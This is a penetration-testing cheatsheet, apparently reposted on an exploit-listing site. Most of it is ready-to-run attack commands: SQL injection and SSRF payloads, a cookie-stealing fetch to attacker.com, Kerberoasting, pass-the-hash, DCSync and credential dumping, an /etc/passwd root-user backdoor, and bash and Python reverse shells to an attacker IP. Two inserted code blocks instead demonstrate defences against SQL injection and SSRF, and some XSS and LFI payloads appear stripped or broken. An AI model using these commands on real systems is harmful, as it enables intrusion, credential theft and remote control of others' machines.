## https://sploitus.com/exploit?id=2DBFA02A-1FF8-528D-8CBD-0BB4657AC723
# pentest-cheatsheet
Commands, techniques and notes for penetration testing — web, AD, network, post-exploitation.
# Pentest Cheatsheet

> Commands, techniques and notes for penetration testing.  
> Covers: recon · web · Active Directory · post-exploitation · privilege escalation.

---

## Table of Contents
- [Recon & Scanning](#recon--scanning)
- [Web Application](#web-application)
- [Active Directory](#active-directory)
- [Post-Exploitation](#post-exploitation)
- [Privilege Escalation](#privilege-escalation)
- [Password Cracking](#password-cracking)
- [File Transfers](#file-transfers)
- [Reverse Shells](#reverse-shells)

---

## Recon & Scanning

### Nmap
```bash
# Fast full port scan (<target> = host or CIDR range)
nmap -p- --min-rate 5000 -T4 <target>

# Service + version + scripts on open ports
nmap -sCV -p 22,80,443 <target>

# UDP scan (top 100)
nmap -sU --top-ports 100 <target>

# OS detection
nmap -O <target>

# Vuln scripts
nmap --script vuln <target>

# Output all formats
nmap -sCV -p- -oA scan_results <target>
```

### Rustscan (faster)
```bash
rustscan -a <target> --ulimit 5000 -- -sCV
```

### Subdomain Enumeration
```bash
# Passive
subfinder -d target.com -o subs.txt
amass enum -passive -d target.com

# Active bruteforce
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
     -u https://FUZZ.target.com -mc 200,301,302

# Certificate transparency
curl -s "https://crt.sh/?q=%.target.com&output=json" | jq '.[].name_value' | sort -u
```

### Directory Fuzzing
```bash
# gobuster
gobuster dir -u http://target.com -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

# ffuf
ffuf -u http://target.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt -mc 200,301,302,403

# feroxbuster (recursive)
feroxbuster -u http://target.com -w wordlist.txt --depth 3
```

---

## Web Application

### SQLi — Manual
```sql
# Boolean-based
' AND 1=1-- -
' AND 1=2-- -

# Error-based
' AND extractvalue(1,concat(0x7e,version()))-- -

# Union — find columns
' ORDER BY 5-- -
' UNION SELECT NULL,NULL,NULL-- -

# Dump DB
' UNION SELECT table_name,NULL FROM information_schema.tables-- -
```
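Added example, not part of the cheatsheet: why the boolean-based probes above work, shown on a constructed sqlite3 `users` table. `login_vulnerable` builds the query by string concatenation, so `' AND 1=1-- -` and `' AND 1=2-- -` flip the result and reveal the injection point; `login_safe` binds the same input as a parameter and the probes become nothing more than an unknown username.

```python
import sqlite3

# Constructed sample data for the demonstration (not from the page).
SAMPLE_USERS = [("alice", "s3cret"), ("bob", "hunter2")]


def make_db():
    """In-memory database with a minimal users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)", SAMPLE_USERS
    )
    return conn


def login_vulnerable(conn, username, password):
    """Input is spliced into the SQL text, so it can change the query's grammar.
    With username = "alice' AND 1=1-- -" the password clause is commented out."""
    query = (
        f"SELECT id FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    return conn.execute(query).fetchone() is not None


def login_safe(conn, username, password):
    """Parameterised query: the driver sends the values separately from the
    SQL text, so quotes and comment markers in the input are just characters."""
    query = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


def boolean_probe(login, conn):
    """Run the two boolean probes from the cheatsheet against a login function.
    Returns (result_for_true_condition, result_for_false_condition); an
    injectable login answers (True, False), a safe one answers (False, False)."""
    true_probe = login(conn, "alice' AND 1=1-- -", "wrong-password")
    false_probe = login(conn, "alice' AND 1=2-- -", "wrong-password")
    return true_probe, false_probe


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", boolean_probe(login_vulnerable, db))  # (True, False)
    print("safe:      ", boolean_probe(login_safe, db))        # (False, False)
```

The differing answers to the two probes are exactly the signal a boolean-based test looks for; with parameter binding both probes fail identically, which is the behaviour to expect from any code that is not injectable.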

### SQLmap
```bash
# Basic
sqlmap -u "http://target.com/page?id=1" --dbs

# POST request
sqlmap -u "http://target.com/login" --data="user=test&pass=test" --dbs

# With cookie
sqlmap -u "http://target.com/page?id=1" --cookie="PHPSESSID=abc123" --dbs

# Dump table
sqlmap -u "http://target.com/?id=1" -D dbname -T users --dump

# OS shell
sqlmap -u "http://target.com/?id=1" --os-shell
```

### XSS
```javascript
// Basic
alert(1)

// Cookie steal
fetch('https://attacker.com/?c='+document.cookie)

// Bypass filters


">alert(1)
```

### SSRF
```bash
# Basic
http://169.254.169.254/latest/meta-data/          # AWS
http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Bypass filters
http://127.0.0.1
http://0.0.0.0
http://[::1]
http://2130706433  # 127.0.0.1 decimal
```
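Added example, not part of the cheatsheet: a naive string denylist next to a validator that canonicalises the host before deciding. Every bypass form listed above (`0.0.0.0`, `[::1]`, the decimal `2130706433`) passes the naive check and is rejected by the hardened one, because the hardened version parses the host into an address and tests address properties instead of comparing strings. The `resolver` parameter is an assumption of this example so that DNS names can be checked offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def naive_allow(url):
    """String denylist as often seen in SSRF filters: matches only the exact
    spellings it was given, so alternative encodings of the same host pass."""
    host = urlsplit(url).hostname or ""
    return host not in ("127.0.0.1", "localhost", "169.254.169.254")


def is_forbidden(ip):
    """Addresses a server-side fetcher should never reach: loopback,
    link-local (which includes the 169.254.169.254 metadata endpoint),
    RFC1918/ULA, multicast, reserved and unspecified (0.0.0.0)."""
    return (ip.is_loopback or ip.is_link_local or ip.is_private
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def parse_ip_literal(host):
    """Address a host literal denotes, or None when it is a DNS name.
    Handles dotted quad, bracketed IPv6 (urlsplit strips the brackets)
    and integer forms such as 2130706433 or 0x7f000001."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        return ipaddress.ip_address(int(host, 0))  # 2130706433 -> 127.0.0.1
    except ValueError:
        return None


def system_resolver(host):
    """Real lookup; tests substitute a stub so they run offline."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def hardened_allow(url, resolver=system_resolver):
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    literal = parse_ip_literal(parts.hostname)
    try:
        if literal is not None:
            targets = [literal]
        else:
            targets = [ipaddress.ip_address(a) for a in resolver(parts.hostname)]
    except (socket.gaierror, ValueError):
        return False
    # Every address the name resolves to must be acceptable, not just the first.
    return bool(targets) and not any(is_forbidden(ip) for ip in targets)


if __name__ == "__main__":
    for u in ("http://0.0.0.0", "http://[::1]", "http://2130706433",
              "http://169.254.169.254/latest/meta-data/"):
        print(u, "naive:", naive_allow(u), "hardened:", hardened_allow(u))
```

Validating and then fetching still leaves a DNS rebinding window between the lookup and the connection; the fetch should connect to the address that was validated (and re-validate on every redirect) rather than resolving the name a second time.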

### LFI
```bash
# Basic
/etc/passwd
../../../../../../etc/passwd

# Log poisoning → RCE
# 1. Inject PHP in User-Agent
curl -H "User-Agent: " http://target.com/

# 2. Include log
http://target.com/?file=/var/log/apache2/access.log&cmd=id

# PHP wrappers
php://filter/convert.base64-encode/resource=/etc/passwd
php://input (POST: )
```

---

## Active Directory

### Enumeration
```bash
# NetExec (nxc)
nxc smb <subnet>/24                                # Discover hosts
nxc smb <target> -u user -p pass --shares          # List shares
nxc smb <target> -u user -p pass --users           # List users
nxc smb <target> -u user -p pass --groups          # List groups
nxc smb <target> -u user -p pass -x "whoami"       # Execute command

# BloodHound collection
bloodhound-python -u user -p pass -d domain.local -ns <dc-ip> -c all

# Impacket — GetADUsers
impacket-GetADUsers -all domain.local/user:pass -dc-ip <dc-ip>

# LDAP enum
ldapsearch -H ldap://<dc-ip> -x -b "DC=domain,DC=local" -D "user@domain.local" -w pass
```

### Kerberos Attacks
```bash
# Kerberoasting — get TGS hashes
impacket-GetUserSPNs domain.local/user:pass -dc-ip <dc-ip> -request

# AS-REP Roasting (no preauth required)
impacket-GetNPUsers domain.local/ -usersfile users.txt -dc-ip <dc-ip> -no-pass

# Pass-the-Ticket
impacket-getTGT domain.local/user:pass
export KRB5CCNAME=user.ccache
impacket-psexec domain.local/user@target -k -no-pass

# Overpass-the-Hash
impacket-getTGT domain.local/user -hashes :NThash
```

### Pass-the-Hash
```bash
# PSExec
impacket-psexec domain.local/admin@<target> -hashes :NThash

# SMBExec
impacket-smbexec domain.local/admin@<target> -hashes :NThash

# WMIExec
impacket-wmiexec domain.local/admin@<target> -hashes :NThash

# nxc
nxc smb <target> -u admin -H NThash -x "whoami"
```

### Credential Dumping
```bash
# SAM dump (local)
impacket-secretsdump local/admin:pass@<target>

# Domain dump (NTDS.dit)
impacket-secretsdump domain.local/admin:pass@<dc-ip> -just-dc

# LSASS (remote)
nxc smb <target> -u admin -p pass -M lsassy
```

### DCSync
```bash
impacket-secretsdump domain.local/admin:pass@<dc-ip> -just-dc-user krbtgt
impacket-secretsdump domain.local/admin:pass@<dc-ip> -just-dc
```

---

## Post-Exploitation

### Windows
```cmd
# System info
whoami /all
systeminfo
net user /domain
net group "Domain Admins" /domain

# Find interesting files
dir /s /b *password* *cred* *secret* 2>nul
findstr /si password *.xml *.ini *.txt

# Scheduled tasks
schtasks /query /fo LIST /v

# Services
sc query type= all state= all
wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"
```

```cmd
# WinPEAS (privesc enum)
.\winPEAS.exe

# PowerShell history
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
```

### Linux
```bash
# Basic enum
id && whoami
sudo -l
grep 'sh$' /etc/passwd                  # accounts with a login shell
find / -perm -4000 -type f 2>/dev/null  # SUID

# Cron jobs
cat /etc/crontab
ls -la /etc/cron.*

# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
```

---

## Privilege Escalation

### Linux — Common vectors
```bash
# Sudo misconfiguration
sudo -l
sudo /bin/bash

# SUID abuse
find / -perm -u=s -type f 2>/dev/null
# Check GTFObins: https://gtfobins.github.io/

# Writable /etc/passwd
# double quotes: inside single quotes $(...) is not expanded and the literal text would be written
echo "hacker:$(openssl passwd -1 password):0:0:root:/root:/bin/bash" >> /etc/passwd

# Writable cron script
echo "chmod +s /bin/bash" >> /path/to/cron/script.sh
```

### Windows — Common vectors
```powershell
# Unquoted service path
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\"

# AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# Token impersonation (PrintSpoofer / GodPotato)
.\PrintSpoofer.exe -i -c cmd
```

---

## Password Cracking

```bash
# Hashcat
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt          # NTLM
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt         # Kerberoast
hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txt         # AS-REP
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule  # with rules

# John
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
john hashes.txt --format=NT --wordlist=/usr/share/wordlists/rockyou.txt
```

---

## File Transfers

```bash
# Python HTTP server (attacker)
python3 -m http.server 8080

# Victim — Linux
wget http://<attacker-ip>:8080/file
curl http://<attacker-ip>:8080/file -o file

# Victim — Windows (PowerShell)
iwr -uri http://<attacker-ip>:8080/file -outfile file
certutil -urlcache -split -f http://<attacker-ip>:8080/file file
```

---

## Reverse Shells

```bash
# Bash
bash -i >& /dev/tcp/<attacker-ip>/4444 0>&1

# Python
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("<attacker-ip>",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

# Netcat listener (attacker)
nc -lvnp 4444

# Shell upgrade
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Ctrl+Z → stty raw -echo; fg → export TERM=xterm
```

---

## Resources

- [HackTricks](https://book.hacktricks.xyz/) — comprehensive pentesting wiki
- [GTFOBins](https://gtfobins.github.io/) — Unix binaries privesc
- [LOLBAS](https://lolbas-project.github.io/) — Windows living off the land
- [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) — payload lists
- [SecLists](https://github.com/danielmiessler/SecLists) — wordlists

---

*More writeups and techniques → [t.me/oxnull_security](https://t.me/oxnull_security) · [dev.to/0xnull](https://dev.to/0xnull)*